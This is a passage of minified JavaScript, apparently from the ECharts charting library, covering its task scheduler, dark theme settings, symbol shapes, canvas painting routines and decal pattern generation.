h,p=c.agentStubMap;p.each(function(t){a(i,t)&&(t.dirty(),h=!0)}),h&&c.dirty(),o.updatePayload(c,n);var d=o.getPerformArgs(c,i.block);p.each(function(t){t.perform(d)}),c.perform(d)&&(r=!0)}else u&&u.each(function(s,l){a(i,s)&&s.dirty();var u=o.getPerformArgs(s,i.block);u.skip=!t.performRawSeries&&e.isSeriesFiltered(s.context.model),o.updatePayload(s,n),s.perform(u)&&(r=!0)})}}),this.unfinished=r||this.unfinished},t.prototype.performSeriesTasks=function(t){var e;t.eachSeries(function(t){e=t.dataTask.perform()||e}),this.unfinished=e||this.unfinished},t.prototype.plan=function(){this._pipelineMap.each(function(t){var e=t.tail;do{if(e.__block){t.blockIndex=e.__idxInPipeline;break}e=e.getUpstream()}while(e)})},t.prototype.updatePayload=function(t,e){"remain"!==e&&(t.context.payload=e)},t.prototype._createSeriesStageTask=function(t,e,n,i){var r=this,o=e.seriesTaskMap,a=e.seriesTaskMap=mt(),s=t.seriesType,l=t.getTargetSeries;function u(e){var s=e.uid,l=a.set(s,o&&o.get(s)||ov({plan:zy,reset:Ey,count:Hy}));l.context={model:e,ecModel:n,api:i,useClearVisual:t.isVisual&&!t.isLayout,plan:t.plan,reset:t.reset,scheduler:r},r._pipe(e,l)}t.createOnAllSeries?n.eachRawSeries(u):s?n.eachRawSeriesByType(s,u):l&&l(n,i).each(u)},t.prototype._createOverallStageTask=function(t,e,n,i){var r=this,o=e.overallTask=e.overallTask||ov({reset:Oy});o.context={ecModel:n,api:i,overallReset:t.overallReset,scheduler:r};var a=o.agentStubMap,s=o.agentStubMap=mt(),l=t.seriesType,u=t.getTargetSeries,c=t.dirtyOnOverallProgress,h=!1,p="";function d(t){var e=t.uid,n=s.set(e,a&&a.get(e)||(h=!0,ov({reset:Ry,onDirty:By})));n.context={model:t,dirtyOnOverallProgress:c},n.agent=o,n.__block=c,r._pipe(t,n)}ct(!t.createOnAllSeries,p),l?n.eachRawSeriesByType(l,d):u?u(n,i).each(d):E(n.getSeries(),d),h&&o.dirty()},t.prototype._pipe=function(t,e){var n=t.uid,i=this._pipelineMap.get(n);!i.head&&(i.head=e),i.tail&&i.tail.pipe(e),i.tail=e,e.__idxInPipeline=i.count++,e.__pipeline=i},t.wrapStageHandler=function(t,e){return X(t)&&(t={overallReset:t,seriesType:Gy(t)}),t.uid=nd("stageHandler"),e&&(t.visualType=e),t},t}();function Oy(t){t.overallReset(t.ecModel,t.api,t.payload)}function Ry(t){return t.dirtyOnOverallProgress&&Ny}function Ny(){this.agent.dirty(),this.getDownstream().dirty()}function By(){this.agent&&this.agent.dirty()}function zy(t){return t.plan?t.plan(t.model,t.ecModel,t.api,t.payload):null}function Ey(t){t.useClearVisual&&t.data.clearAllVisual();var e=t.resetDefines=da(t.reset(t.model,t.ecModel,t.api,t.payload));return e.length>1?V(e,function(t,e){return Fy(e)}):Vy}var Vy=Fy(0);function Fy(t){return function(e,n){var i=n.data,r=n.resetDefines[t];if(r&&r.dataEach)for(var o=e.start;o<e.end;o++)r.dataEach(i,o);else r&&r.progress&&r.progress(e,i)}}function Hy(t){return t.data.count()}function Gy(t){Wy=null;try{t(Uy,Zy)}catch(t){}return Wy}var Wy,Uy={},Zy={};function Yy(t,e){for(var n in e.prototype)t[n]=St}Yy(Uy,eg),Yy(Zy,Mu),Uy.eachSeriesByType=Uy.eachRawSeriesByType=function(t){Wy=t},Uy.eachComponent=function(t){"series"===t.mainType&&t.subType&&(Wy=t.subType)};var Xy,jy=Cf.darkColor,qy=jy.background,Ky=function(){return{axisLine:{lineStyle:{color:jy.axisLine}},splitLine:{lineStyle:{color:jy.axisSplitLine}},splitArea:{areaStyle:{color:[jy.backgroundTint,jy.backgroundTransparent]}},minorSplitLine:{lineStyle:{color:jy.axisMinorSplitLine}},axisLabel:{color:jy.axisLabel},axisName:{}}},$y={label:{color:jy.secondary},itemStyle:{borderColor:jy.borderTint},dividerLineStyle:{color:jy.border}},Qy={darkMode:!0,color:jy.theme,backgroundColor:qy,axisPointer:{lineStyle:{color:jy.border},crossStyle:{color:jy.borderShade},label:{color:jy.tertiary}},legend:{textStyle:{color:jy.secondary},pageTextStyle:{color:jy.tertiary}},textStyle:{color:jy.secondary},title:{textStyle:{color:jy.primary},subtextStyle:{color:jy.quaternary}},toolbox:{iconStyle:{borderColor:jy.accent50},feature:{dataView:{backgroundColor:qy,textColor:jy.primary,textareaColor:jy.background,textareaBorderColor:jy.border,buttonColor:jy.accent50,buttonTextColor:jy.neutral00}}},tooltip:{backgroundColor:jy.neutral20,defaultBorderColor:jy.border,textStyle:{color:jy.tertiary}},dataZoom:{borderColor:jy.accent10,textStyle:{color:jy.tertiary},brushStyle:{color:jy.backgroundTint},handleStyle:{color:jy.neutral00,borderColor:jy.accent20},moveHandleStyle:{color:jy.accent40},emphasis:{handleStyle:{borderColor:jy.accent50}},dataBackground:{lineStyle:{color:jy.accent30},areaStyle:{color:jy.accent20}},selectedDataBackground:{lineStyle:{color:jy.accent50},areaStyle:{color:jy.accent30}}},visualMap:{textStyle:{color:jy.secondary},handleStyle:{borderColor:jy.neutral30}},timeline:{lineStyle:{color:jy.accent10},label:{color:jy.tertiary},controlStyle:{color:jy.accent30,borderColor:jy.accent30}},calendar:{itemStyle:{color:jy.neutral00,borderColor:jy.neutral20},dayLabel:{color:jy.tertiary},monthLabel:{color:jy.secondary},yearLabel:{color:jy.secondary}},matrix:{x:$y,y:$y,backgroundColor:{borderColor:jy.axisLine},body:{itemStyle:{borderColor:jy.borderTint}}},timeAxis:Ky(),logAxis:Ky(),valueAxis:Ky(),categoryAxis:Ky(),line:{symbol:"circle"},graph:{color:jy.theme},gauge:{title:{color:jy.secondary},axisLine:{lineStyle:{color:[[1,jy.neutral05]]}},axisLabel:{color:jy.axisLabel},detail:{color:jy.primary}},candlestick:{itemStyle:{color:"#f64e56",color0:"#54ea92",borderColor:"#f64e56",borderColor0:"#54ea92"}},funnel:{itemStyle:{borderColor:jy.background}},radar:(Xy=Ky(),Xy.axisName={color:jy.axisLabel},Xy.axisLine.lineStyle.color=jy.neutral20,Xy),treemap:{breadcrumb:{itemStyle:{color:jy.neutral20,textStyle:{color:jy.secondary}},emphasis:{itemStyle:{color:jy.neutral30}}}},sunburst:{itemStyle:{borderColor:jy.background}},map:{itemStyle:{borderColor:jy.border,areaColor:jy.neutral10},label:{color:jy.tertiary},emphasis:{label:{color:jy.primary},itemStyle:{areaColor:jy.highlight}},select:{label:{color:jy.primary},itemStyle:{areaColor:jy.highlight}}},geo:{itemStyle:{borderColor:jy.border,areaColor:jy.neutral10},emphasis:{label:{color:jy.primary},itemStyle:{areaColor:jy.highlight}},select:{label:{color:jy.primary},itemStyle:{color:jy.highlight}}}};Qy.categoryAxis.splitLine.show=!1;var Jy=function(){function t(){}return t.prototype.normalizeQuery=function(t){var e={},n={},i={};if(j(t)){var r=Ka(t);e.mainType=r.main||null,e.subType=r.sub||null}else{var o=["Index","Name","Id"],a={name:1,dataIndex:1,dataType:1};E(t,function(t,r){for(var s=!1,l=0;l<o.length;l++){var u=o[l],c=r.lastIndexOf(u);if(c>0&&c===r.length-u.length){var h=r.slice(0,c);"data"!==h&&(e.mainType=h,e[u.toLowerCase()]=t,s=!0)}}a.hasOwnProperty(r)&&(n[r]=t,s=!0),s||(i[r]=t)})}return{cptQuery:e,dataQuery:n,otherQuery:i}},t.prototype.filter=function(t,e){var n=this.eventInfo;if(!n)return!0;var i=n.targetEl,r=n.packedEvent,o=n.model,a=n.view;if(!o||!a)return!0;var s=e.cptQuery,l=e.dataQuery;return u(s,o,"mainType")&&u(s,o,"subType")&&u(s,o,"index","componentIndex")&&u(s,o,"name")&&u(s,o,"id")&&u(l,r,"name")&&u(l,r,"dataIndex")&&u(l,r,"dataType")&&(!a.filterForExposedEvent||a.filterForExposedEvent(t,e.otherQuery,i,r));function u(t,e,n,i){return null==t[n]||e[i||n]===t[n]}},t.prototype.afterTrigger=function(){this.eventInfo=null},t}(),tm=["symbol","symbolSize","symbolRotate","symbolOffset"],em=tm.concat(["symbolKeepAspect"]),nm={createOnAllSeries:!0,performRawSeries:!0,reset:function(t,e){var n=t.getData();if(t.legendIcon&&n.setVisual("legendIcon",t.legendIcon),t.hasSymbolVisual){for(var i={},r={},o=!1,a=0;a<tm.length;a++){var s=tm[a],l=t.get(s);X(l)?(o=!0,r[s]=l):i[s]=l}if(i.symbol=i.symbol||t.defaultSymbol,n.setVisual(A({legendIcon:t.legendIcon||i.symbol,symbolKeepAspect:t.get("symbolKeepAspect")},i)),!e.isSeriesFiltered(t)){var u=W(r);return{dataEach:o?function(e,n){for(var i=t.getRawValue(n),o=t.getDataParams(n),a=0;a<u.length;a++){var s=u[a];e.setItemVisual(n,s,r[s](i,o))}}:null}}}}},im={createOnAllSeries:!0,performRawSeries:!0,reset:function(t,e){if(t.hasSymbolVisual&&!e.isSeriesFiltered(t))return{dataEach:t.getData().hasItemOption?function(t,e){for(var n=t.getItemModel(e),i=0;i<em.length;i++){var r=em[i],o=n.getShallow(r,!0);null!=o&&t.setItemVisual(e,r,o)}}:null}}};function rm(t,e){switch(e){case"color":return t.getVisual("style")[t.getVisual("drawType")];case"opacity":return t.getVisual("style").opacity;case"symbol":case"symbolSize":case"liftZ":return t.getVisual(e)}}function om(t,e,n,i,r){var o=t+e;n.isSilent(o)||i.eachComponent({mainType:"series",subType:"pie"},function(t){for(var e=t.seriesIndex,i=t.option.selectedMap,a=r.selected,s=0;s<a.length;s++)if(a[s].seriesIndex===e){var l=t.getData(),u=Ma(l,r.fromActionPayload);n.trigger(o,{type:o,seriesId:t.id,name:Y(u)?l.getName(u[0]):l.getName(u),selected:j(i)?i:A({},i)})}})}function am(t,e,n){for(var i;t&&(!e(t)||(i=t,!n));)t=t.__hostTarget||t.parent;return i}var sm=new Kt,lm={};function um(t){return lm[t]}var cm=Ta();function hm(t){return cm(t).prepare}function pm(t){return cm(t).fullUpdate}var dm=Math.round(9*Math.random()),fm="function"==typeof Object.defineProperty,gm=function(){function t(){this._id="__ec_inner_"+dm++}return t.prototype.get=function(t){return this._guard(t)[this._id]},t.prototype.set=function(t,e){var n=this._guard(t);return fm?Object.defineProperty(n,this._id,{value:e,enumerable:!1,configurable:!0}):n[this._id]=e,this},t.prototype.delete=function(t){return!!this.has(t)&&(delete this._guard(t)[this._id],!0)},t.prototype.has=function(t){return!!this._guard(t)[this._id]},t.prototype._guard=function(t){if(t!==Object(t))throw TypeError("Value of WeakMap is not a non-null object.");return t},t}(),vm=Bl.extend({type:"triangle",shape:{cx:0,cy:0,width:0,height:0},buildPath:function(t,e){var n=e.cx,i=e.cy,r=e.width/2,o=e.height/2;t.moveTo(n,i-o),t.lineTo(n+r,i+o),t.lineTo(n-r,i+o),t.closePath()}}),ym=Bl.extend({type:"diamond",shape:{cx:0,cy:0,width:0,height:0},buildPath:function(t,e){var n=e.cx,i=e.cy,r=e.width/2,o=e.height/2;t.moveTo(n,i-o),t.lineTo(n+r,i),t.lineTo(n,i+o),t.lineTo(n-r,i),t.closePath()}}),mm=Bl.extend({type:"pin",shape:{x:0,y:0,width:0,height:0},buildPath:function(t,e){var n=e.x,i=e.y,r=e.width/5*3,o=Math.max(r,e.height),a=r/2,s=a*a/(o-a),l=i-o+a+s,u=Math.asin(s/a),c=Math.cos(u)*a,h=Math.sin(u),p=Math.cos(u),d=.6*a,f=.7*a;t.moveTo(n-c,l+s),t.arc(n,l,a,Math.PI-u,2*Math.PI+u),t.bezierCurveTo(n+c-h*d,l+s+p*d,n,i-f,n,i),t.bezierCurveTo(n,i-f,n-c+h*d,l+s+p*d,n-c,l+s),t.closePath()}}),_m=Bl.extend({type:"arrow",shape:{x:0,y:0,width:0,height:0},buildPath:function(t,e){var n=e.height,i=e.width,r=e.x,o=e.y,a=i/3*2;t.moveTo(r,o),t.lineTo(r+a,o+n),t.lineTo(r,o+n/4*3),t.lineTo(r-a,o+n),t.lineTo(r,o),t.closePath()}}),xm={line:function(t,e,n,i,r){r.x1=t,r.y1=e+i/2,r.x2=t+n,r.y2=e+i/2},rect:function(t,e,n,i,r){r.x=t,r.y=e,r.width=n,r.height=i},roundRect:function(t,e,n,i,r){r.x=t,r.y=e,r.width=n,r.height=i,r.r=Math.min(n,i)/4},square:function(t,e,n,i,r){var o=Math.min(n,i);r.x=t,r.y=e,r.width=o,r.height=o},circle:function(t,e,n,i,r){r.cx=t+n/2,r.cy=e+i/2,r.r=Math.min(n,i)/2},diamond:function(t,e,n,i,r){r.cx=t+n/2,r.cy=e+i/2,r.width=n,r.height=i},pin:function(t,e,n,i,r){r.x=t+n/2,r.y=e+i/2,r.width=n,r.height=i},arrow:function(t,e,n,i,r){r.x=t+n/2,r.y=e+i/2,r.width=n,r.height=i},triangle:function(t,e,n,i,r){r.cx=t+n/2,r.cy=e+i/2,r.width=n,r.height=i}},bm={};E({line:hh,rect:jl,roundRect:jl,square:jl,circle:Ec,diamond:ym,pin:mm,arrow:_m,triangle:vm},function(t,e){bm[e]=new t});var wm=Bl.extend({type:"symbol",shape:{symbolType:"",x:0,y:0,width:0,height:0},calculateTextPosition:function(t,e,n){var i=Kr(t,e,n),r=this.shape;return r&&"pin"===r.symbolType&&"inside"===e.position&&(i.y=n.y+.4*n.height),i},buildPath:function(t,e,n){var i=e.symbolType;if("none"!==i){var r=bm[i];r||(r=bm[i="rect"]),xm[i](e.x,e.y,e.width,e.height,r.shape),r.buildPath(t,r.shape,n)}}});function Sm(t,e){if("image"!==this.type){var n=this.style;this.__isEmptyBrush?(n.stroke=t,n.fill=e||Cf.color.neutral00,n.lineWidth=2):"line"===this.shape.symbolType?n.stroke=t:n.fill=t,this.markRedraw()}}function Mm(t,e,n,i,r,o,a){var s,l=0===t.indexOf("empty");return l&&(t=t.substr(5,1).toLowerCase()+t.substr(6)),(s=0===t.indexOf("image://")?Qh(t.slice(8),new Ue(e,n,i,r),a?"center":"cover"):0===t.indexOf("path://")?$h(t.slice(7),{},new Ue(e,n,i,r),a?"center":"cover"):new wm({shape:{symbolType:t,x:e,y:n,width:i,height:r}})).__isEmptyBrush=l,s.setColor=Sm,o&&s.setColor(o),s}function Tm(t){return Y(t)||(t=[+t,+t]),[t[0]||0,t[1]||0]}function km(t,e){if(null!=t)return Y(t)||(t=[t,t]),[No(t[0],e[0])||0,No(at(t[1],t[0]),e[1])||0]}function Cm(t){return isFinite(t)}function Im(t,e,n){for(var i="radial"===e.type?function(t,e,n){var i=n.width,r=n.height,o=Math.min(i,r),a=null==e.x?.5:e.x,s=null==e.y?.5:e.y,l=null==e.r?.5:e.r;return e.global||(a=a*i+n.x,s=s*r+n.y,l*=o),a=Cm(a)?a:.5,s=Cm(s)?s:.5,l=l>=0&&Cm(l)?l:.5,t.createRadialGradient(a,s,0,a,s,l)}(t,e,n):function(t,e,n){var i=null==e.x?0:e.x,r=null==e.x2?1:e.x2,o=null==e.y?0:e.y,a=null==e.y2?0:e.y2;return e.global||(i=i*n.width+n.x,r=r*n.width+n.x,o=o*n.height+n.y,a=a*n.height+n.y),i=Cm(i)?i:0,r=Cm(r)?r:1,o=Cm(o)?o:0,a=Cm(a)?a:0,t.createLinearGradient(i,o,r,a)}(t,e,n),r=e.colorStops,o=0;o<r.length;o++)i.addColorStop(r[o].offset,r[o].color);return i}function Dm(t){return parseInt(t,10)}function Am(t,e,n){var i=["width","height"][e],r=["clientWidth","clientHeight"][e],o=["paddingLeft","paddingTop"][e],a=["paddingRight","paddingBottom"][e];if(null!=n[i]&&"auto"!==n[i])return parseFloat(n[i]);var s=document.defaultView.getComputedStyle(t);return(t[r]||Dm(s[i])||Dm(t.style[i]))-(Dm(s[o])||0)-(Dm(s[a])||0)||0}function Pm(t){var e,n,i=t.style,r=i.lineDash&&i.lineWidth>0&&(e=i.lineDash,n=i.lineWidth,e&&"solid"!==e&&n>0?"dashed"===e?[4*n,2*n]:"dotted"===e?[n]:K(e)?[e]:Y(e)?e:null:null),o=i.lineDashOffset;if(r){var a=i.strokeNoScale&&t.getLineScale?t.getLineScale():1;a&&1!==a&&(r=V(r,function(t){return t/a}),o/=a)}return[r,o]}var Lm=new gl(!0);function Om(t){var e=t.stroke;return!(null==e||"none"===e||!(t.lineWidth>0))}function Rm(t){return"string"==typeof t&&"none"!==t}function Nm(t){var e=t.fill;return null!=e&&"none"!==e}function Bm(t,e){if(null!=e.fillOpacity&&1!==e.fillOpacity){var n=t.globalAlpha;t.globalAlpha=e.fillOpacity*e.opacity,t.fill(),t.globalAlpha=n}else t.fill()}function zm(t,e){if(null!=e.strokeOpacity&&1!==e.strokeOpacity){var n=t.globalAlpha;t.globalAlpha=e.strokeOpacity*e.opacity,t.stroke(),t.globalAlpha=n}else t.stroke()}function Em(t,e,n){var i=ls(e.image,e.__image,n);if(cs(i)){var r=t.createPattern(i,e.repeat||"repeat");if("function"==typeof DOMMatrix&&r&&r.setTransform){var o=new DOMMatrix;o.translateSelf(e.x||0,e.y||0),o.rotateSelf(0,0,(e.rotation||0)*Mt),o.scaleSelf(e.scaleX||1,e.scaleY||1),r.setTransform(o)}return r}}var Vm=["shadowBlur","shadowOffsetX","shadowOffsetY"],Fm=[["lineCap","butt"],["lineJoin","miter"],["miterLimit",10]];function Hm(t,e,n,i,r){var o=!1;if(!i&&e===(n=n||{}))return!1;if(i||e.opacity!==n.opacity){Um(t,r),o=!0;var a=Math.max(Math.min(e.opacity,1),0);t.globalAlpha=isNaN(a)?As.opacity:a}(i||e.blend!==n.blend)&&(o||(Um(t,r),o=!0),t.globalCompositeOperation=e.blend||As.blend);for(var s=0;s<Vm.length;s++){var l=Vm[s];(i||e[l]!==n[l])&&(o||(Um(t,r),o=!0),t[l]=t.dpr*(e[l]||0))}return(i||e.shadowColor!==n.shadowColor)&&(o||(Um(t,r),o=!0),t.shadowColor=e.shadowColor||As.shadowColor),o}function Gm(t,e,n,i,r){var o=e.style,a=i?null:n&&n.style||{};if(o===a)return!1;var s=Hm(t,o,a,i,r);if((i||o.fill!==a.fill)&&(s||(Um(t,r),s=!0),Rm(o.fill)&&(t.fillStyle=o.fill)),(i||o.stroke!==a.stroke)&&(s||(Um(t,r),s=!0),Rm(o.stroke)&&(t.strokeStyle=o.stroke)),(i||o.opacity!==a.opacity)&&(s||(Um(t,r),s=!0),t.globalAlpha=null==o.opacity?1:o.opacity),e.hasStroke()){var l=o.lineWidth/(o.strokeNoScale&&e.getLineScale?e.getLineScale():1);t.lineWidth!==l&&(s||(Um(t,r),s=!0),t.lineWidth=l)}for(var u=0;u<Fm.length;u++){var c=Fm[u],h=c[0];(i||o[h]!==a[h])&&(s||(Um(t,r),s=!0),t[h]=o[h]||c[1])}return s}function Wm(t,e){var n=e.transform,i=t.dpr||1;n?t.setTransform(i*n[0],i*n[1],i*n[2],i*n[3],i*n[4],i*n[5]):t.setTransform(i,0,0,i,0,0)}function Um(t,e){e.batchFill&&(e.batchFill=!1,t.fill()),e.batchStroke&&(e.batchStroke=!1,t.stroke())}function Zm(t,e){var n={inHover:!1,viewWidth:0,viewHeight:0,beforeBrushParam:{}};Ym(t,e,n),Xm(t,n)}function Ym(t,e,n){var i=e.transform;if(!e.shouldBePainted(n.viewWidth,n.viewHeight,!1,!1))return e.__dirty&=-2,void(e.__isRendered=!1);var r=e.__clipPaths,o=n.prevElClipPaths,s=e.style,l=!1,u=!1;if(o&&!function(t,e){if(t===e||!t&&!e)return!1;if(!t||!e||t.length!==e.length)return!0;for(var n=0;n<t.length;n++)if(t[n]!==e[n])return!0;return!1}(r,o)||(o&&(Um(t,n),t.restore(),u=l=!0,n.prevElClipPaths=null,n.allClipped=!1,n.prevEl=null),r&&r.length&&(Um(t,n),t.save(),function(t,e,n){for(var i=!1,r=0;r<t.length;r++){var o=t[r];i=i||o.isZeroArea(),Wm(e,o),e.beginPath(),o.buildPath(e,o.shape),e.clip()}n.allClipped=i}(r,t,n),l=!0,n.prevElClipPaths=r)),n.allClipped)return e.__dirty&=-2,void(e.__isRendered=!1);e.beforeBrush&&e.beforeBrush(n.beforeBrushParam),e.innerBeforeBrush();var c=n.prevEl;c||(u=l=!0);var h,p,d=e instanceof Bl&&e.autoBatch&&function(t){var e=Nm(t),n=Om(t);return!(t.lineDash||!(+e^+n)||e&&"string"!=typeof t.fill||n&&"string"!=typeof t.stroke||t.strokePercent<1||t.strokeOpacity<1||t.fillOpacity<1)}(s);l||(h=i,p=c.transform,h&&p?h[0]!==p[0]||h[1]!==p[1]||h[2]!==p[2]||h[3]!==p[3]||h[4]!==p[4]||h[5]!==p[5]:h||p)?(Um(t,n),Wm(t,e)):d||Um(t,n),e instanceof Bl?(1!==n.lastDrawType&&(u=!0,n.lastDrawType=1),Gm(t,e,c,u,n),d&&(n.batchFill||n.batchStroke)||t.beginPath(),function(t,e,n,i,r){var o,a=Om(n),s=Nm(n),l=n.strokePercent,u=l<1,c=!e.path;e.silent&&!u||!c||e.createPathProxy();var h=e.path||Lm,p=e.__dirty;if(!i){var d=n.fill,f=n.stroke,g=s&&!!d.colorStops,v=a&&!!f.colorStops,y=s&&!!d.image,m=a&&!!f.image,_=void 0,x=void 0,b=void 0,w=void 0,S=void 0;(g||v)&&(S=e.getBoundingRect()),g&&(_=p?Im(t,d,S):e.__canvasFillGradient,e.__canvasFillGradient=_),v&&(x=p?Im(t,f,S):e.__canvasStrokeGradient,e.__canvasStrokeGradient=x),y&&(b=p||!e.__canvasFillPattern?Em(t,d,e):e.__canvasFillPattern,e.__canvasFillPattern=b),m&&(w=p||!e.__canvasStrokePattern?Em(t,f,e):e.__canvasStrokePattern,e.__canvasStrokePattern=w),g?t.fillStyle=_:y&&(b?t.fillStyle=b:s=!1),v?t.strokeStyle=x:m&&(w?t.strokeStyle=w:a=!1)}var M,T,k=e.getGlobalScale();h.setScale(k[0],k[1],e.segmentIgnoreThreshold),t.setLineDash&&n.lineDash&&(M=(o=Pm(e))[0],T=o[1]);var C=!0;(c||4&p)&&(h.setDPR(t.dpr),u?h.setContext(null):(h.setContext(t),C=!1),h.reset(),e.buildPath(h,e.shape,i),h.toStatic(),e.pathUpdated()),C&&h.rebuildPath(t,u?l:1),M&&(t.setLineDash(M),t.lineDashOffset=T),i?(r.batchFill=s,r.batchStroke=a):n.strokeFirst?(a&&zm(t,n),s&&Bm(t,n)):(s&&Bm(t,n),a&&zm(t,n)),M&&t.setLineDash([])}(t,e,s,d,n)):e instanceof El?(3!==n.lastDrawType&&(u=!0,n.lastDrawType=3),Gm(t,e,c,u,n),function(t,e,n){var i,r=n.text;if(null!=r&&(r+=""),r){t.font=n.font||a,t.textAlign=n.textAlign,t.textBaseline=n.textBaseline;var o=void 0,s=void 0;t.setLineDash&&n.lineDash&&(o=(i=Pm(e))[0],s=i[1]),o&&(t.setLineDash(o),t.lineDashOffset=s),n.strokeFirst?(Om(n)&&t.strokeText(r,n.x,n.y),Nm(n)&&t.fillText(r,n.x,n.y)):(Nm(n)&&t.fillText(r,n.x,n.y),Om(n)&&t.strokeText(r,n.x,n.y)),o&&t.setLineDash([])}}(t,e,s)):e instanceof Hl?(2!==n.lastDrawType&&(u=!0,n.lastDrawType=2),function(t,e,n,i,r){Hm(t,e.style,n&&n.style,i,r)}(t,e,c,u,n),function(t,e,n){var i=e.__image=ls(n.image,e.__image,e,e.onload);if(i&&cs(i)){var r=n.x||0,o=n.y||0,a=e.getWidth(),s=e.getHeight(),l=i.width/i.height;if(null==a&&null!=s?a=s*l:null==s&&null!=a?s=a/l:null==a&&null==s&&(a=i.width,s=i.height),n.sWidth&&n.sHeight){var u=n.sx||0,c=n.sy||0;t.drawImage(i,u,c,n.sWidth,n.sHeight,r,o,a,s)}else if(n.sx&&n.sy){var h=a-(u=n.sx),p=s-(c=n.sy);t.drawImage(i,u,c,h,p,r,o,a,s)}else t.drawImage(i,r,o,a,s)}}(t,e,s)):e.getTemporalDisplayables&&(4!==n.lastDrawType&&(u=!0,n.lastDrawType=4),function(t,e,n){var i=e.getDisplayables(),r=e.getTemporalDisplayables();t.save();var o,a,s={prevElClipPaths:null,prevEl:null,allClipped:!1,viewWidth:n.viewWidth,viewHeight:n.viewHeight,inHover:n.inHover,beforeBrushParam:{}};for(o=e.getCursor(),a=i.length;o<a;o++){(c=i[o]).beforeBrush&&c.beforeBrush(n.beforeBrushParam),c.innerBeforeBrush(),Ym(t,c,s),c.innerAfterBrush(),c.afterBrush&&c.afterBrush(),s.prevEl=c}Xm(t,s);for(var l=0,u=r.length;l<u;l++){var c;(c=r[l]).beforeBrush&&c.beforeBrush(n.beforeBrushParam),c.innerBeforeBrush(),Ym(t,c,s),c.innerAfterBrush(),c.afterBrush&&c.afterBrush(),s.prevEl=c}Xm(t,s),e.clearTemporalDisplayables(),e.notClear=!0,t.restore()}(t,e,n)),e.innerAfterBrush(),e.afterBrush&&(d&&Um(t,n),e.afterBrush()),n.prevEl=e,e.__dirty=0,e.__isRendered=!0}function Xm(t,e){Um(t,e),e.prevElClipPaths&&t.restore()}var jm=new gm,qm=new Qn(100),Km=["symbol","symbolSize","symbolKeepAspect","color","backgroundColor","dashArrayX","dashArrayY","maxTileWidth","maxTileHeight"];function $m(t,e){if("none"===t)return null;var n=e.getDevicePixelRatio(),i=e.getZr(),r="svg"===i.painter.type;t.dirty&&jm.delete(t);var o=jm.get(t);if(o)return o;var a=L(t,{symbol:"rect",symbolSize:1,symbolKeepAspect:!0,color:"rgba(0, 0, 0, 0.2)",backgroundColor:null,dashArrayX:5,dashArrayY:5,rotation:0,maxTileWidth:512,maxTileHeight:512});"none"===a.backgroundColor&&(a.backgroundColor=null);var s={repeat:"repeat"};return function(t){for(var e,o=[n],s=!0,l=0;l<Km.length;++l){var u=a[Km[l]];if(null!=u&&!Y(u)&&!j(u)&&!K(u)&&"boolean"!=typeof u){s=!1;break}o.push(u)}if(s){e=o.join(",")+(r?"-svg":"");var h=qm.get(e);h&&(r?t.svgElement=h:t.image=h)}var p,d=Jm(a.dashArrayX),f=function(t){if(!t||"object"==typeof t&&0===t.length)return[0,0];if(K(t)){var e=Math.ceil(t);return[e,e]}var n=V(t,function(t){return Math.ceil(t)});return t.length%2?n.concat(n):n}(a.dashArrayY),g=Qm(a.symbol),v=(b=d,V(b,function(t){return t_(t)})),y=t_(f),m=!r&&c.createCanvas(),_=r&&{tag:"g",attrs:{},key:"dcl",children:[]},x=function(){for(var t=1,e=0,n=v.length;e<n;++e)t=na(t,v[e]);var i=1;for(e=0,n=g.length;e<n;++e)i=na(i,g[e].length);t*=i;var r=y*v.length*g.length;return{width:Math.max(1,Math.min(t,a.maxTileWidth)),height:Math.max(1,Math.min(r,a.maxTileHeight))}}();var b;m&&(m.width=x.width*n,m.height=x.height*n,p=m.getContext("2d"));(function(){p&&(p.clearRect(0,0,m.width,m.height),a.backgroundColor&&(p.fillStyle=a.backgroundColor,p.fillRect(0,0,m.width,m.height)));for(var t=0,e=0;e<f.length;++e)t+=f[e];if(t<=0)return;var o=-y,s=0,l=0,u=0;for(;o<x.height;){if(s%2==0){for(var c=l/2%g.length,h=0,v=0,b=0;h<2*x.width;){var w=0;for(e=0;e<d[u].length;++e)w+=d[u][e];if(w<=0)break;if(v%2==0){var S=.5*(1-a.symbolSize),M=h+d[u][v]*S,T=o+f[s]*S,k=d[u][v]*a.symbolSize,C=f[s]*a.symbolSize,I=b/2%g[c].length;D(M,T,k,C,g[c][I])}h+=d[u][v],++b,++v===d[u].length&&(v=0)}++u===d.length&&(u=0)}o+=f[s],++l,++s===f.length&&(s=0)}function D(t,e,o,s,l){var u=r?1:n,c=Mm(l,t*u,e*u,o*u,s*u,a.color,a.symbolKeepAspect);if(r){var h=i.painter.renderOneToVNode(c);h&&_.children.push(h)}else Zm(p,c)}})(),s&&qm.put(e,m||_);t.image=m,t.svgElement=_,t.svgWidth=x.width,t.svgHeight=x.height}(s),s.rotation=a.rotation,s.scaleX=s.scaleY=r?1:1/n,jm.set(t,s),t.dirty=!1,s}function Qm(t){if(!t||0===t.length)return[["rect"]];if(j(t))return[[t]];for(var e=!0,n=0;n<t.length;++n)if(!j(t[n])){e=!1;break}if(e)return Qm([t]);var i=[];for(n=0;n<t.length;++n)j(t[n])?i.push([t[n]]):i.push(t[n]);return i}function Jm(t){if(!t||0===t.length)return[[0,0]];if(K(t))return[[r=Math.ceil(t),r]];for(var e=!0,n=0;n<t.length;++n)if(!K(t[n])){e=!1;break}if(e)return Jm([t]);var i=[];for(n=0;n<t.length;++n)if(K(t[n])){var r=Math.ceil(t[n]);i.push([r,r])}else{(r=V(t[n],function(t){return Math.ceil(t)})).length%2==1?i.push(r.concat(r)):i.push(r)}return i}function t_(t){for(var e=0,n=0;n<t.length;++n)e+=t[n];return t.length%2==1?2*e:e}var e_=Xa(function(t,e){t.eachRawSeries(function(n){if(!t.isSeriesFiltered(n)){var i=n.getData();i.hasItemVisual()&&i.each(function(t){var n=i.getItemVisual(t,"decal");n&&(i.ensureUniqueItemVisual(t,"style").decal=$m(n,e))});var r=i.getVisual("decal");if(r)i.getVisual("style").decal=$m(r,e)}})});var n_=2e3,i_=4500,r_={PROCESSOR:{SERIES_FILTER:800,AXIS_STATISTICS:920,FILTER:1e3,STATISTIC:5e3,STATISTICS:5e3},VISUAL:{LAYOUT:1e3,PROGRESSIVE_LAYOUT:1100,GLOBAL:n_,CHART:3e3,POST_CHART_LAYOUT:4600,COMPONENT:4e3,BRUSH:5e3,CHART_ITEM:i_,ARIA:6e3,DECAL:7e3}},o_="__flagInMainProcess",a_="__mainProcessVersion",s_="__pendingUpdate",l_="__needsUpdateStatus",u_=/^[a-zA-Z0-9_]+$/,c_="__connectUpdateStatus";function h_(t){return function(){for(var 